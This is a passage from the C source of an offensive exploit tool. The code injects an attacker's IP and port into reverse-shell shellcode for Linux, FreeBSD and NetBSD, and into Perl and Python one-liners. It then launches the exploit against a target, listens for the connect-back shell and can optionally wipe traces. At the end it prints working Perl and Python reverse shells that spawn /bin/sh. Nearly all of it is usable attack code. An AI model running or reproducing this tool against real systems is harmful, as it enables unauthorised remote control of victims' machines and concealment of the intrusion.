        /*
         * start: conversion of IP into ascii-encoded hex
         */

        /***************************/
        /* convert binary coded ip into ascii hex and inject it into sishell */
        /***************************/

        /* use sprintf() to convert ip to hex */
        sprintf(buf, "\\x%02x\\x%02x\\x%02x\\x%02x",
            ((uint8_t *)&xored_ip)[0],
            ((uint8_t *)&xored_ip)[1],
            ((uint8_t *)&xored_ip)[2],
            ((uint8_t *)&xored_ip)[3]);
        memcpy((void *)&linux_sishell[linux_IP_OFFSET], buf, strlen(buf));
        memcpy((void *)&freebsd_sishell[freebsd_IP_OFFSET], buf, strlen(buf));
        memcpy((void *)&netbsd_sishell[netbsd_IP_OFFSET], buf, strlen(buf));

        /* use sprintf() to convert port to hex */
        sprintf(buf, "\\x%02x\\x%02x",
            ((uint8_t *)&lport)[1],     /* assume host sys is little-endian */
            ((uint8_t *)&lport)[0]);
        memcpy((void *)&linux_sishell[linux_PORT_OFFSET], buf, strlen(buf));
        memcpy((void *)&freebsd_sishell[freebsd_PORT_OFFSET], buf, strlen(buf));
        memcpy((void *)&netbsd_sishell[netbsd_PORT_OFFSET], buf, strlen(buf));

        /***************************/
        /* start encoding ip+port for Sabu's Perl shellcode */
        /***************************/

        /* start with ip address */
        snprintf(buf2, sizeof(buf2), "\"%s\"", ascii_ip);

        /* calculate how many spaces we shall pad with */
        i = sabushell_perl_ipbuf_len - strlen(buf2);
        memset(&buf2[strlen(buf2)], 0x20, i);

        /* convert buf2 into hex and inject it into sabushell */
        for (i = 0; i < sabushell_perl_ipbuf_len; i++) {
            sprintf(&buf[i*4], "\\x%02x", buf2[i]);
        }
        /* parse string into sabushell */
        memcpy(&sabushell_perl[sabushell_perl_ip_offset], buf, sabushell_perl_ipbuf_len*4);

        /* now do port number */
        snprintf(buf2, sizeof(buf2), "%u", lport);
        i = sabushell_perl_portbuf_len - strlen(buf2);
        memset(&buf2[strlen(buf2)], 0x20, i);
        for (i = 0; i < sabushell_perl_portbuf_len; i++) {
            sprintf(&buf[i*4], "\\x%02x", buf2[i]);
        }
        memcpy(&sabushell_perl[sabushell_perl_port_offset], buf, sabushell_perl_portbuf_len*4);

        /***************************/
        /* start encoding ip+port for Sabu's Python shellcode */
        /***************************/

        /* produce ascii string for sabushell */
        snprintf(buf2, sizeof(buf2),
            "'%s',%u", ascii_ip, lport);
        /* calculate how many spaces we shall pad with */
        i = sabushell_python_ipbuf_len - strlen(buf2);
        /* pad with spaces */
        memset(&buf2[strlen(buf2)], 0x20, i);

        /* convert buf2 into hex and inject it into sabushell */

        for (i = 0; i < sabushell_python_ipbuf_len; i++) {
            sprintf(&buf[i*4], "\\x%02x", buf2[i]);
        }
        /* parse string into sabushell */
        memcpy(&sabushell_python[sabushell_python_ip_offset], buf, sabushell_python_ipbuf_len*4);

        snprintf(buf, sizeof(buf),
            "perl -e \"print \\\"%s\\\"\"", sabushell_python);

        /******* encoding of ip+port is done *********/

    /* end of non-wgeturl */
    }

    if (!dumpout && builtin_listener && !silent)
        printf("[i] will listen for incoming connection on port %u\n", lport);

    if (dumpout && !wgeturl && !silent)
        printf("[i] dumping shellcode to file %s\n", dumpout);

    if (sourceport && (!dumpout)) {
        if (!silent)
            printf("[i] http connections will land on target from source port %u\n", sourceport);
    }

    #ifdef WITH_SSL
        if (!dumpout) {
            if (!strncasecmp(url, "https://", 8)) {
                if (!silent)
                    printf("[i] initializing OpenSSL library\n");

                SSL_library_init();
                SSL_load_error_strings();
                sslmethod = SSLv23_client_method();

                if (!(sslctx = SSL_CTX_new(sslmethod))) {
                    if (!silent) {
                        fprintf(stderr, "[?] SSL_CTX_new() failed!\n");
                    }
                    #ifdef WIN32
                        WSACleanup();
                    #endif
                    return 1;
                }
            }
        }
    #endif

    #if ! defined WITHOUT_HINT
        if ((!silent) && (!dumpout)) {
            printf("[i] **hint** if you get a shell, try rrs -> http://www.cycom.se/dl/rrs\n");
        }
    #endif


    if ((!force) && (!silent)) {
        printf("[i] press return to continue... (disable this prompt with -f)");
        i = getc(stdin);
    }

    /* if we want to generate shellcode, do it */
    if (dumpout && !wgeturl) {      /* generate shellcode */
        FILE *filep;
        if (!(filep = fopen(dumpout, "w"))) {
            fprintf(stderr, "[?] error creating/truncating file %s: %s\n", dumpout, strerror(errno));
            #ifdef WIN32
                WSACleanup();
            #endif
            return 1;
        }
        if (!decodehex(shellcode_p, filep)) {
            fprintf(stderr, "[?] error trying to dump shellcode\n");
            #ifdef WIN32
                WSACleanup();
            #endif
            return 1;
        }
        if (fclose(filep)) {
            fprintf(stderr, "[?] error closing file %s: %s\n", dumpout, strerror(errno));
            #ifdef WIN32
                WSACleanup();
            #endif
            return 1;
        }

        if (!silent)
            printf("[i] saved shellcode in %s\n", dumpout);

        #ifdef WIN32
            WSACleanup();
        #endif
        return 0;
    }

    /*** the moment is here... sploit it... ***/
    ping();

    fflush(stdout);
    fflush(stderr);

    if (!builtin_listener) {
        /* we don't fork and listen for an incoming connection */
        pong();
        if (dowipeout)
            wipeout();
    } else {
        #ifdef WIN32
            /* we create a thread and listen for incoming */
            DWORD ThreadId;
            HANDLE h;

            thread_lock = 1;

            h = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE) pongthread,
                NULL, 0, &ThreadId);

            /* call listener() to bind, listen and accept incoming connection */
            listener();

            if (verbose && !silent)
                printf("[i] waiting for child thread to terminate...\n");

            if (h) {
                CloseHandle(h);
                while (thread_lock == 1) {
                    Sleep(50);
                    continue;
                }
            }

        #else
            /* we fork and listen for incoming */
            pid = fork();
            if (pid < 0) {
                fprintf(stderr, "[?] fork(): %s\n", strerror(errno));
                return 1;
            } else if (pid) {
                /* parent */

                /* install signal handler for SIGCHLD (to resolve [<defunct>] child process) */
                signal(SIGCHLD, signalhandler);

                /* call listener() to bind, listen and accept incoming connection */
                listener();
                if (verbose && !silent)
                    printf("[i] waiting for child process to terminate...\n");
                wait(0);
                exit(0);
            } else {
                /* child */
                silent = 1;
                /* close all descriptors in this thread, we won't need them */
                fclose(stdin);
                fclose(stdout);
                fclose(stderr);
                pong();
                if (dowipeout)
                    wipeout();
                exit(0);
            }
        #endif
    }

    #ifdef WIN32
        WSACleanup();
    #endif
    return 0;
}

/******************************************************************************
                          Source code to shellcode
******************************************************************************/


/******************************************************************************
 * Sabu's <sabu@sentinix.org> reverse (connecting) Perl shellcode:
 *

#!/usr/bin/perl
use Socket; use IO::Handle; use POSIX; $proto = getprotobyname('tcp'); socket(Socket_Handle, AF_INET, SOCK_STREAM, $proto); $sin = sockaddr_in(7700 ,inet_aton("127.0.0.1"      )); connect(Socket_Handle,$sin); dup2(Socket_Handle->fileno, 0); dup2(Socket_Handle->fileno, 1); dup2(Socket_Handle->fileno, 2); exec { "/bin/sh" } "";

*/

/******************************************************************************
 * Sabu's <sabu@mad.scientist.com> reverse (connecting) Python shellcode:

#!/usr/bin/env python
s=__import__('socket').socket(__import__('socket').AF_INET,__import__('socket').SOCK_STREAM);s.connect(('127.0.0.1',7700       ));__import__('os').dup2(s.fileno(),0);__import__('os').dup2(s.fileno(),1);__import__('os').dup2(s.fileno(),2);__import__('os').execl('/bin/sh','')

*/

/******************************************************************************
 * Shadowinteger's sishell is distributed separately
 * http://cycom.se/dl/sishell
 */

/******************************************************************************
                              that's it folks
                              //Shadowinteger
******************************************************************************/

